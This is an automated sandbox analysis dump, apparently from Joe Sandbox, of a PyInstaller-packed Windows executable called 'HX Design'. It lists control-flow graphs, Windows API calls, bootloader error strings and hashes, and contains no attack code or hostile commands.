                                                                                                                                                                                                                                                      control_flow_graph 331 7ff732061950-7ff73206198b call 7ff7320645c0 334 7ff732061c4e-7ff732061c72 call 7ff73206c550 331->334 335 7ff732061991-7ff7320619d1 call 7ff732067f90 331->335 340 7ff732061c3b-7ff732061c3e call 7ff73207004c 335->340 341 7ff7320619d7-7ff7320619e7 call 7ff7320706d4 335->341 344 7ff732061c43-7ff732061c4b 340->344 346 7ff732061a08-7ff732061a24 call 7ff73207039c 341->346 347 7ff7320619e9-7ff732061a03 call 7ff732074f08 call 7ff732062910 341->347 344->334 353 7ff732061a26-7ff732061a40 call 7ff732074f08 call 7ff732062910 346->353 354 7ff732061a45-7ff732061a5a call 7ff732074f28 346->354 347->340 353->340 360 7ff732061a5c-7ff732061a76 call 7ff732074f08 call 7ff732062910 354->360 361 7ff732061a7b-7ff732061afc call 7ff732061c80 * 2 call 7ff7320706d4 354->361 360->340 373 7ff732061b01-7ff732061b14 call 7ff732074f44 361->373 376 7ff732061b16-7ff732061b30 call 7ff732074f08 call 7ff732062910 373->376 377 7ff732061b35-7ff732061b4e call 7ff73207039c 373->377 376->340 383 7ff732061b50-7ff732061b6a call 7ff732074f08 call 7ff732062910 377->383 384 7ff732061b6f-7ff732061b8b call 7ff732070110 377->384 383->340 391 7ff732061b9e-7ff732061bac 384->391 392 7ff732061b8d-7ff732061b99 call 7ff732062710 384->392 391->340 393 7ff732061bb2-7ff732061bb9 391->393 392->340 397 7ff732061bc1-7ff732061bc7 393->397 398 7ff732061bc9-7ff732061bd6 397->398 399 7ff732061be0-7ff732061bef 397->399 400 7ff732061bf1-7ff732061bfa 398->400 399->399 399->400 401 7ff732061bfc-7ff732061bff 400->401 402 7ff732061c0f 400->402 401->402 403 7ff732061c01-7ff732061c04 401->403 404 7ff732061c11-7ff732061c24 402->404 403->402 405 7ff732061c06-7ff732061c09 403->405 406 7ff732061c2d-7ff732061c39 404->406 407 7ff732061c26 404->407 405->402 408 7ff732061c0b-7ff732061c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732067F90: _fread_nolock.LIBCMT ref: 00007FF73206803A
                                                                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF732061A1B
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                      • Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                                      • Instruction ID: 6abbf888d3bef507ff97607c077b66e6df0a285623eb5ece0453c1632daea40a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B81A571B0C686A5EB20FB14D0402B9E3A1EF88B84FC48531D98D87796DEBCE54DE764

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 409 7ff732061600-7ff732061611 410 7ff732061637-7ff732061651 call 7ff7320645c0 409->410 411 7ff732061613-7ff73206161c call 7ff732061050 409->411 418 7ff732061653-7ff732061681 call 7ff732074f08 call 7ff732062910 410->418 419 7ff732061682-7ff73206169c call 7ff7320645c0 410->419 416 7ff73206162e-7ff732061636 411->416 417 7ff73206161e-7ff732061629 call 7ff732062710 411->417 417->416 425 7ff73206169e-7ff7320616b3 call 7ff732062710 419->425 426 7ff7320616b8-7ff7320616cf call 7ff7320706d4 419->426 433 7ff732061821-7ff732061824 call 7ff73207004c 425->433 434 7ff7320616f9-7ff7320616fd 426->434 435 7ff7320616d1-7ff7320616f4 call 7ff732074f08 call 7ff732062910 426->435 442 7ff732061829-7ff73206183b 433->442 436 7ff732061717-7ff732061737 call 7ff732074f44 434->436 437 7ff7320616ff-7ff73206170b call 7ff732061210 434->437 447 7ff732061819-7ff73206181c call 7ff73207004c 435->447 448 7ff732061739-7ff73206175c call 7ff732074f08 call 7ff732062910 436->448 449 7ff732061761-7ff73206176c 436->449 444 7ff732061710-7ff732061712 437->444 444->447 447->433 461 7ff73206180f-7ff732061814 448->461 453 7ff732061802-7ff73206180a call 7ff732074f30 449->453 454 7ff732061772-7ff732061777 449->454 453->461 457 7ff732061780-7ff7320617a2 call 7ff73207039c 454->457 464 7ff7320617da-7ff7320617e6 call 7ff732074f08 457->464 465 7ff7320617a4-7ff7320617bc call 7ff732070adc 457->465 461->447 472 7ff7320617ed-7ff7320617f8 call 7ff732062910 464->472 470 7ff7320617be-7ff7320617c1 465->470 471 7ff7320617c5-7ff7320617d8 call 7ff732074f08 465->471 470->457 473 7ff7320617c3 470->473 471->472 476 7ff7320617fd 472->476 473->476 476->453
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                      • Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                                                      • Instruction ID: fd6216224f01b94c8a35ccb1669811369356611b9856f716e9b985dda1a0cd91
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7251A021B08643B2EA10BB25D4001BAE3A0FF84B94FC44531EE9C47B96DEBCE55DE764

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF732063CBB), ref: 00007FF732068704
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206870A
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF732063CBB), ref: 00007FF73206874C
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068830: GetEnvironmentVariableW.KERNEL32(00007FF73206388E), ref: 00007FF732068867
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF732068889
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732078238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078251
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                      • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                      • Instruction ID: d0dd66a154c182609d2c8bcf00ad31e4365669649a75384d994d52692b1424e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41C611B19642A4FA10FB25B8952BAD291EF84BC0FC00131ED4D47BDAEEBCE50DE324

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 756 7ff732061210-7ff73206126d call 7ff73206bd80 759 7ff732061297-7ff7320612af call 7ff732074f44 756->759 760 7ff73206126f-7ff732061296 call 7ff732062710 756->760 765 7ff7320612d4-7ff7320612e4 call 7ff732074f44 759->765 766 7ff7320612b1-7ff7320612cf call 7ff732074f08 call 7ff732062910 759->766 772 7ff732061309-7ff73206131b 765->772 773 7ff7320612e6-7ff732061304 call 7ff732074f08 call 7ff732062910 765->773 777 7ff732061439-7ff73206144e call 7ff73206ba60 call 7ff732074f30 * 2 766->777 776 7ff732061320-7ff732061345 call 7ff73207039c 772->776 773->777 785 7ff73206134b-7ff732061355 call 7ff732070110 776->785 786 7ff732061431 776->786 793 7ff732061453-7ff73206146d 777->793 785->786 792 7ff73206135b-7ff732061367 785->792 786->777 794 7ff732061370-7ff732061398 call 7ff73206a1c0 792->794 797 7ff73206139a-7ff73206139d 794->797 798 7ff732061416-7ff73206142c call 7ff732062710 794->798 799 7ff73206139f-7ff7320613a9 797->799 800 7ff732061411 797->800 798->786 802 7ff7320613ab-7ff7320613b9 call 7ff732070adc 799->802 803 7ff7320613d4-7ff7320613d7 799->803 800->798 809 7ff7320613be-7ff7320613c1 802->809 804 7ff7320613ea-7ff7320613ef 803->804 805 7ff7320613d9-7ff7320613e7 call 7ff732089e30 803->805 804->794 808 7ff7320613f5-7ff7320613f8 804->808 805->804 811 7ff73206140c-7ff73206140f 808->811 812 7ff7320613fa-7ff7320613fd 808->812 813 7ff7320613c3-7ff7320613cd call 7ff732070110 809->813 814 7ff7320613cf-7ff7320613d2 809->814 811->786 812->798 815 7ff7320613ff-7ff732061407 812->815 813->804 813->814 814->798 815->776
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                      • Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                                      • Instruction ID: 7ba33010c38cec13a7fd246382fb8c393174fd09f7c6121060df5aca34d75fb0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A510B22B0864265EA20BB15E4403BAE391FF84B94FC84131ED8D47BD5EFBCE549E724

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73207F0AA,?,?,-00000018,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE8C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73207F0AA,?,?,-00000018,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE98
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                      • Instruction ID: 1ae3251433425d48dc2999c71131b0912bad1daea6f160dbf7a7001fc4b6ab02
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1412831B1AA02A1FA15FB1A9800675A391FF48B90FC84535DD1D47394EFBCE84DE360

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF732063804), ref: 00007FF7320636E1
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF732063804), ref: 00007FF7320636EB
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                      • Instruction ID: b618fc54f69114c14a619e3fe3a4bbddf1446a396af661121fa170e6144b99cd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD219561B1864261FA30B724EC543BAE2A0FF88754FC00232D65D825D5EEACE50DE768

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 901 7ff73207ba5c-7ff73207ba82 902 7ff73207ba9d-7ff73207baa1 901->902 903 7ff73207ba84-7ff73207ba98 call 7ff732074ee8 call 7ff732074f08 901->903 905 7ff73207be77-7ff73207be83 call 7ff732074ee8 call 7ff732074f08 902->905 906 7ff73207baa7-7ff73207baae 902->906 919 7ff73207be8e 903->919 925 7ff73207be89 call 7ff73207a8e0 905->925 906->905 908 7ff73207bab4-7ff73207bae2 906->908 908->905 911 7ff73207bae8-7ff73207baef 908->911 914 7ff73207bb08-7ff73207bb0b 911->914 915 7ff73207baf1-7ff73207bb03 call 7ff732074ee8 call 7ff732074f08 911->915 917 7ff73207be73-7ff73207be75 914->917 918 7ff73207bb11-7ff73207bb17 914->918 915->925 922 7ff73207be91-7ff73207bea8 917->922 918->917 923 7ff73207bb1d-7ff73207bb20 918->923 919->922 923->915 926 7ff73207bb22-7ff73207bb47 923->926 925->919 929 7ff73207bb7a-7ff73207bb81 926->929 930 7ff73207bb49-7ff73207bb4b 926->930 934 7ff73207bb56-7ff73207bb6d call 7ff732074ee8 call 7ff732074f08 call 7ff73207a8e0 929->934 935 7ff73207bb83-7ff73207bbab call 7ff73207d5fc call 7ff73207a948 * 2 929->935 932 7ff73207bb4d-7ff73207bb54 930->932 933 7ff73207bb72-7ff73207bb78 930->933 932->933 932->934 938 7ff73207bbf8-7ff73207bc0f 933->938 966 7ff73207bd00 934->966 962 7ff73207bbad-7ff73207bbc3 call 7ff732074f08 call 7ff732074ee8 935->962 963 7ff73207bbc8-7ff73207bbf3 call 7ff73207c284 935->963 941 7ff73207bc8a-7ff73207bc94 call 7ff73208391c 938->941 942 7ff73207bc11-7ff73207bc19 938->942 954 7ff73207bd1e 941->954 955 7ff73207bc9a-7ff73207bcaf 941->955 942->941 943 7ff73207bc1b-7ff73207bc1d 942->943 943->941 947 7ff73207bc1f-7ff73207bc35 943->947 947->941 951 7ff73207bc37-7ff73207bc43 947->951 951->941 956 7ff73207bc45-7ff73207bc47 951->956 958 7ff73207bd23-7ff73207bd43 ReadFile 954->958 955->954 960 7ff73207bcb1-7ff73207bcc3 GetConsoleMode 955->960 956->941 961 7ff73207bc49-7ff73207bc61 956->961 964 7ff73207be3d-7ff73207be46 GetLastError 958->964 965 7ff73207bd49-7ff73207bd51 958->965 960->954 967 7ff73207bcc5-7ff73207bccd 960->967 961->941 971 7ff73207bc63-7ff73207bc6f 961->971 962->966 963->938 968 7ff73207be48-7ff73207be5e call 7ff732074f08 call 7ff732074ee8 964->968 969 7ff73207be63-7ff73207be66 964->969 965->964 973 7ff73207bd57 965->973 970 7ff73207bd03-7ff73207bd0d call 7ff73207a948 966->970 967->958 975 7ff73207bccf-7ff73207bcf1 ReadConsoleW 967->975 968->966 979 7ff73207be6c-7ff73207be6e 969->979 980 7ff73207bcf9-7ff73207bcfb call 7ff732074e7c 969->980 970->922 971->941 978 7ff73207bc71-7ff73207bc73 971->978 982 7ff73207bd5e-7ff73207bd73 973->982 984 7ff73207bcf3 GetLastError 975->984 985 7ff73207bd12-7ff73207bd1c 975->985 978->941 989 7ff73207bc75-7ff73207bc85 978->989 979->970 980->966 982->970 991 7ff73207bd75-7ff73207bd80 982->991 984->980 985->982 989->941 994 7ff73207bda7-7ff73207bdaf 991->994 995 7ff73207bd82-7ff73207bd9b call 7ff73207b674 991->995 996 7ff73207be2b-7ff73207be38 call 7ff73207b4b4 994->996 997 7ff73207bdb1-7ff73207bdc3 994->997 1003 7ff73207bda0-7ff73207bda2 995->1003 996->1003 1000 7ff73207be1e-7ff73207be26 997->1000 1001 7ff73207bdc5 997->1001 1000->970 1004 7ff73207bdca-7ff73207bdd1 1001->1004 1003->970 1006 7ff73207be0d-7ff73207be18 1004->1006 1007 7ff73207bdd3-7ff73207bdd7 1004->1007 1006->1000 1008 7ff73207bdd9-7ff73207bde0 1007->1008 1009 7ff73207bdf3 1007->1009 1008->1009 1010 7ff73207bde2-7ff73207bde6 1008->1010 1011 7ff73207bdf9-7ff73207be09 1009->1011 1010->1009 1012 7ff73207bde8-7ff73207bdf1 1010->1012 1011->1004 1013 7ff73207be0b 1011->1013 1012->1011 1013->1000
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                      • Instruction ID: 4a19d13d763459d487f822cfd77626a00406124f9568a92944f9add027675a12
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBC1D82290C686A2E760BB1994402BEF760FB85B90FD54131EA4E07791DFFCE85DE720

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                      • Instruction ID: 99ab8d3462857a18c1737d43d3f8125bc7726cb1d0dcaa71e4af67ac107d6d1d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9213231B0CA4252EB50AB55B58423AE3A0FF857A0F900235EA6D83BE5DEFCD44DDB14

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetCurrentProcess.KERNEL32 ref: 00007FF732068590
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732068570: GetTokenInformation.KERNELBASE ref: 00007FF7320685C8
